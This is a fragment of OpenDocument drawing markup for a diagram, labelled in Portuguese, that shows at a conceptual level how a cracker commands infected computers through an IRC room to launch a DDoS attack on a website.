            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 356 1516" draw:type="non-primitive" draw:enhanced-path="M 71 307 L 0 1441 82 1516 356 1235 356 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.517cm" svg:height="0.114cm" svg:x="2.427cm" svg:y="12.761cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 578 127" draw:type="non-primitive" draw:enhanced-path="M 578 127 L 578 63 0 0 0 67 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.533cm" svg:height="1.145cm" svg:x="2.42cm" svg:y="11.681cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 597 1282" draw:type="non-primitive" draw:enhanced-path="M 597 1282 L 597 67 0 0 0 1224 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.52cm" svg:height="1.129cm" svg:x="2.424cm" svg:y="11.693cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 582 1262" draw:type="non-primitive" draw:enhanced-path="M 582 1262 L 582 64 0 0 0 1197 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.436cm" svg:height="0.202cm" svg:x="2.466cm" svg:y="11.997cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 488 226" draw:type="non-primitive" draw:enhanced-path="M 488 226 L 488 47 0 0 0 179 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.446cm" svg:height="0.142cm" svg:x="2.462cm" svg:y="11.762cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 499 159" draw:type="non-primitive" draw:enhanced-path="M 499 159 L 499 47 0 0 0 111 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr18" draw:text-style-name="P1" draw:layer="layout" svg:width="0.436cm" svg:height="0.206cm" svg:x="2.466cm" svg:y="12.178cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 488 230" draw:type="non-primitive" draw:enhanced-path="M 488 230 L 488 51 0 0 0 183 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.422cm" svg:height="0.08cm" svg:x="2.474cm" svg:y="12.674cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 472 90" draw:type="non-primitive" draw:enhanced-path="M 472 90 L 472 53 0 0 0 37 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.424cm" svg:height="0.079cm" svg:x="2.469cm" svg:y="11.771cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 474 88" draw:type="non-primitive" draw:enhanced-path="M 474 88 L 474 54 0 0 0 37 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.424cm" svg:height="0.075cm" svg:x="2.469cm" svg:y="11.823cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 474 84" draw:type="non-primitive" draw:enhanced-path="M 474 84 L 474 47 0 0 0 34 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.415cm" svg:height="0.184cm" svg:x="2.474cm" svg:y="12.006cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 464 205" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 464 205 L 464 50 0 0 0 158 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.415cm" svg:height="0.184cm" svg:x="2.474cm" svg:y="12.19cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 464 206" draw:type="non-primitive" draw:enhanced-path="M 464 206 L 464 54 0 0 0 155 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr4" draw:text-style-name="P1" draw:layer="layout" svg:width="0.054cm" svg:height="0.054cm" svg:x="2.839cm" svg:y="12.633cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 61 60" draw:type="non-primitive" draw:enhanced-path="M 61 60 L 61 7 0 0 0 50 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:g>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.739cm" svg:height="0.195cm" svg:x="5.986cm" svg:y="13.679cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 826 218" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 167 0 L 826 91 707 218 0 70 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.433cm" svg:height="0.693cm" svg:x="6.618cm" svg:y="14.16cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 485 775" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 775 L 485 245 485 0 224 99 0 524 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.939cm" svg:height="0.363cm" svg:x="5.679cm" svg:y="14.49cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1051 406" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 260 L 1051 406 1051 129 94 0 0 15 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr8" draw:text-style-name="P1" draw:layer="layout" svg:width="1.372cm" svg:height="0.601cm" svg:x="5.679cm" svg:y="14.032cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1536 672" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 477 0 L 1536 138 1051 672 0 527 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P1" draw:layer="layout" svg:width="0.646cm" svg:height="0.344cm" svg:x="5.986cm" svg:y="14.16cm">
            <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0" draw:text-style-name="P3" draw:layer="layout" svg:x1="5.874cm" svg:y1="13.819cm" svg:x2="5.948cm" svg:y2="13.74cm">
            <text:p/>
          </draw:line>
          <draw:custom-shape draw:style-name="gr11" draw:text-style-name="P1" draw:layer="layout" svg:width="0.693cm" svg:height="0.685cm" svg:x="5.874cm" svg:y="13.819cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 775 766" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 667 L 775 766 775 103 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.773cm" svg:height="0.171cm" svg:x="5.874cm" svg:y="13.74cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 864 191" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 74 0 L 864 109 775 191 0 88 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P1" draw:layer="layout" svg:width="0.11cm" svg:height="0.666cm" svg:x="6.611cm" svg:y="13.749cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 124 745" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 124 489 L 8 745 0 143 124 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.082cm" svg:height="0.665cm" svg:x="6.567cm" svg:y="13.837cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 91 743" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 89 646 L 0 743 0 82 91 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr13" draw:text-style-name="P1" draw:layer="layout" svg:width="0.55cm" svg:height="0.49cm" svg:x="5.94cm" svg:y="13.911cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 615 548" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 615 77 L 615 548 0 472 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P1" draw:layer="layout" svg:width="0.526cm" svg:height="0.474cm" svg:x="5.964cm" svg:y="13.914cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 588 530" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 588 73 L 588 530 0 455 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.074cm" svg:height="0.604cm" svg:x="6.647cm" svg:y="13.754cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 84 676" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 94 L 84 0 78 490 0 676 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.725cm" svg:height="0.148cm" svg:x="5.996cm" svg:y="13.689cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 812 166" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 728 166 L 812 75 137 0 0 59 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr15" draw:text-style-name="P1" draw:layer="layout" svg:width="0.232cm" svg:height="0.034cm" svg:x="6.164cm" svg:y="14.649cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 260 40" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 0 L 0 8 260 40 254 33 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:g>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.739cm" svg:height="0.195cm" svg:x="3.086cm" svg:y="13.053cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 826 218" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 167 0 L 826 91 707 218 0 70 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.433cm" svg:height="0.693cm" svg:x="3.718cm" svg:y="13.534cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 485 775" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 775 L 485 245 485 0 224 99 0 524 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.939cm" svg:height="0.363cm" svg:x="2.779cm" svg:y="13.864cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1051 406" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 260 L 1051 406 1051 129 94 0 0 15 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr8" draw:text-style-name="P1" draw:layer="layout" svg:width="1.372cm" svg:height="0.601cm" svg:x="2.779cm" svg:y="13.406cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1536 672" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 477 0 L 1536 138 1051 672 0 527 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P1" draw:layer="layout" svg:width="0.646cm" svg:height="0.344cm" svg:x="3.086cm" svg:y="13.534cm">
            <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0" draw:text-style-name="P3" draw:layer="layout" svg:x1="2.974cm" svg:y1="13.193cm" svg:x2="3.048cm" svg:y2="13.114cm">
            <text:p/>
          </draw:line>
          <draw:custom-shape draw:style-name="gr11" draw:text-style-name="P1" draw:layer="layout" svg:width="0.693cm" svg:height="0.685cm" svg:x="2.974cm" svg:y="13.193cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 775 766" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 667 L 775 766 775 103 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.773cm" svg:height="0.171cm" svg:x="2.974cm" svg:y="13.114cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 864 191" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 74 0 L 864 109 775 191 0 88 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P1" draw:layer="layout" svg:width="0.11cm" svg:height="0.666cm" svg:x="3.711cm" svg:y="13.123cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 124 745" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 124 489 L 8 745 0 143 124 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.082cm" svg:height="0.665cm" svg:x="3.667cm" svg:y="13.211cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 91 743" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 89 646 L 0 743 0 82 91 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr13" draw:text-style-name="P1" draw:layer="layout" svg:width="0.55cm" svg:height="0.49cm" svg:x="3.04cm" svg:y="13.285cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 615 548" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 615 77 L 615 548 0 472 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P1" draw:layer="layout" svg:width="0.526cm" svg:height="0.474cm" svg:x="3.064cm" svg:y="13.288cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 588 530" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 588 73 L 588 530 0 455 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.074cm" svg:height="0.604cm" svg:x="3.747cm" svg:y="13.128cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 84 676" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 94 L 84 0 78 490 0 676 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.725cm" svg:height="0.148cm" svg:x="3.096cm" svg:y="13.063cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 812 166" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 728 166 L 812 75 137 0 0 59 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr15" draw:text-style-name="P1" draw:layer="layout" svg:width="0.232cm" svg:height="0.034cm" svg:x="3.264cm" svg:y="14.023cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 260 40" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 0 L 0 8 260 40 254 33 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:frame draw:style-name="gr20" draw:text-style-name="P5" draw:layer="layout" svg:width="4.913cm" svg:height="0.911cm" svg:x="6.905cm" svg:y="6.853cm">
          <draw:text-box>
            <text:p text:style-name="P4"><text:span text:style-name="T1">2. Cracker envia comandos aos bots pela sala de IRC</text:span></text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame draw:style-name="gr20" draw:text-style-name="P5" draw:layer="layout" svg:width="4.665cm" svg:height="1.241cm" svg:x="6.925cm" svg:y="13.654cm">
          <draw:text-box>
            <text:p text:style-name="P4"><text:span text:style-name="T1">1. Computadores atacados, com bots esperando comandos do cracker</text:span></text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame draw:style-name="gr20" draw:text-style-name="P5" draw:layer="layout" svg:width="2.771cm" svg:height="0.911cm" svg:x="9.9cm" svg:y="9.653cm">
          <draw:text-box>
            <text:p text:style-name="P4"><text:span text:style-name="T1">3. Site vítima de DDoS</text:span></text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame draw:style-name="gr20" draw:text-style-name="P6" draw:layer="layout" svg:width="2.771cm" svg:height="1.411cm" svg:x="7.182cm" svg:y="10.76cm">
          <draw:text-box>
            <text:p text:style-name="P4"><text:span text:style-name="T2">Ataque DDoS</text:span></text:p>
          </draw:text-box>
        </draw:frame>
        <draw:line draw:style-name="gr21" draw:text-style-name="P2" draw:layer="layout" svg:x1="9.046cm" svg:y1="8.387cm" svg:x2="6.453cm" svg:y2="8.387cm">
          <text:p/>
        </draw:line>
        <draw:g>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.739cm" svg:height="0.195cm" svg:x="8.878cm" svg:y="7.8cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 826 218" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 167 0 L 826 91 707 218 0 70 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.433cm" svg:height="0.693cm" svg:x="9.51cm" svg:y="8.281cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 485 775" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 775 L 485 245 485 0 224 99 0 524 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr7" draw:text-style-name="P1" draw:layer="layout" svg:width="0.939cm" svg:height="0.363cm" svg:x="8.571cm" svg:y="8.611cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1051 406" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 260 L 1051 406 1051 129 94 0 0 15 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr8" draw:text-style-name="P1" draw:layer="layout" svg:width="1.372cm" svg:height="0.601cm" svg:x="8.571cm" svg:y="8.153cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 1536 672" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 477 0 L 1536 138 1051 672 0 527 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P1" draw:layer="layout" svg:width="0.646cm" svg:height="0.344cm" svg:x="8.878cm" svg:y="8.281cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 21600 21600" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:glue-points="10800 0 3160 3160 0 10800 3160 18440 10800 21600 18440 18440 21600 10800 18440 3160" draw:text-areas="3200 3200 18400 18400" draw:type="ellipse"/>
          </draw:custom-shape>
          <draw:line draw:style-name="gr10" draw:text-style-name="P3" draw:layer="layout" svg:x1="8.766cm" svg:y1="7.94cm" svg:x2="8.84cm" svg:y2="7.861cm">
            <text:p/>
          </draw:line>
          <draw:custom-shape draw:style-name="gr11" draw:text-style-name="P1" draw:layer="layout" svg:width="0.693cm" svg:height="0.685cm" svg:x="8.766cm" svg:y="7.94cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 775 766" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 667 L 775 766 775 103 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.773cm" svg:height="0.171cm" svg:x="8.766cm" svg:y="7.861cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 864 191" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 74 0 L 864 109 775 191 0 88 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P1" draw:layer="layout" svg:width="0.11cm" svg:height="0.666cm" svg:x="9.503cm" svg:y="7.87cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 124 745" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 124 489 L 8 745 0 143 124 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.082cm" svg:height="0.665cm" svg:x="9.459cm" svg:y="7.958cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 91 743" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 89 646 L 0 743 0 82 91 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr13" draw:text-style-name="P1" draw:layer="layout" svg:width="0.55cm" svg:height="0.49cm" svg:x="8.832cm" svg:y="8.032cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 615 548" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 615 77 L 615 548 0 472 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr22" draw:text-style-name="P1" draw:layer="layout" svg:width="0.526cm" svg:height="0.474cm" svg:x="8.856cm" svg:y="8.035cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 588 530" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 588 73 L 588 530 0 455 0 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.074cm" svg:height="0.604cm" svg:x="9.539cm" svg:y="7.875cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 84 676" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 94 L 84 0 78 490 0 676 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr6" draw:text-style-name="P1" draw:layer="layout" svg:width="0.725cm" svg:height="0.148cm" svg:x="8.888cm" svg:y="7.81cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 812 166" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 728 166 L 812 75 137 0 0 59 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr15" draw:text-style-name="P1" draw:layer="layout" svg:width="0.232cm" svg:height="0.034cm" svg:x="9.056cm" svg:y="8.77cm">
            <text:p/>
            <draw:enhanced-geometry svg:viewBox="0 0 260 40" draw:mirror-horizontal="false" draw:mirror-vertical="false" draw:type="non-primitive" draw:enhanced-path="M 0 0 L 0 8 260 40 254 33 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:line draw:style-name="gr23" draw:text-style-name="P2" draw:layer="layout" svg:x1="3.325cm" svg:y1="10.366cm" svg:x2="5.594cm" svg:y2="8.853cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr23" draw:text-style-name="P2" draw:layer="layout" svg:x1="3.216cm" svg:y1="11.755cm" svg:x2="5.594cm" svg:y2="8.853cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr23" draw:text-style-name="P2" draw:layer="layout" svg:x1="3.667cm" svg:y1="13.114cm" svg:x2="5.594cm" svg:y2="8.853cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr23" draw:text-style-name="P2" draw:layer="layout" svg:x1="4.902cm" svg:y1="13.553cm" svg:x2="5.594cm" svg:y2="8.853cm">
          <text:p/>
        </draw:line>
        <draw:line draw:style-name="gr23" draw:text-style-name="P2" draw:layer="layout" svg:x1="6.375cm" svg:y1="13.679cm" svg:x2="5.594cm" svg:y2="8.853cm">
          <text:p/>
        </draw:line>
        <draw:g>
          <draw:circle draw:style-name="gr24" draw:text-style-name="P2" draw:layer="layout" svg:width="1.373cm" svg:height="1.373cm" svg:x="5.08cm" svg:y="7.701cm">
            <text:p/>
          </draw:circle>
          <draw:frame draw:style-name="gr25" draw:text-style-name="P7" draw:layer="layout" svg:width="1.672cm" svg:height="0.911cm" svg:x="4.93cm" svg:y="7.932cm">
            <draw:text-box>
              <text:p text:style-name="P4"><text:span text:style-name="T3">Sala de IRC</text:span></text:p>
            </draw:text-box>
          </draw:frame>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0" draw:display-name="Gradient 10" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#b1b100" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_11" draw:display-name="Gradient 11" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#bc0024" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_12" draw:display-name="Gradient 12" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#bc0024" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_15" draw:display-name="Gradient 15" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#ffad2c" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_16" draw:display-name="Gradient 16" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#ffad2c" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_17" draw:display-name="Gradient 17" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#a0a0a0" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_18" draw:display-name="Gradient 18" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#002c7c" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_19" draw:display-name="Gradient 19" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#0000ff" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_20" draw:display-name="Gradient 20" draw:style="axial" draw:start-color="#000000" draw:end-color="#ffffff" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_21" draw:display-name="Gradient 21" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#919191" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_22" draw:display-name="Gradient 22" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#000000" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_23" draw:display-name="Gradient 23" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#6e6e6e" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_7" draw:display-name="Gradient 7" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#009800" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_8" draw:display-name="Gradient 8" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#008000" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_9" draw:display-name="Gradient 9" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#005100" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="315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Lucida Sans Unicode'" style:font-pitch-asian="variable" style:font-size-asian="24pt" style:language-asian="pt" style:country-asian="BR" style:font-family-complex="Tahoma" style:font-pitch-complex="variable" style:font-size-complex="24pt" style:language-complex="pt" style:country-complex="BR"/>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dp1"/>
  </office:master-styles>
</office:document-styles>
</file>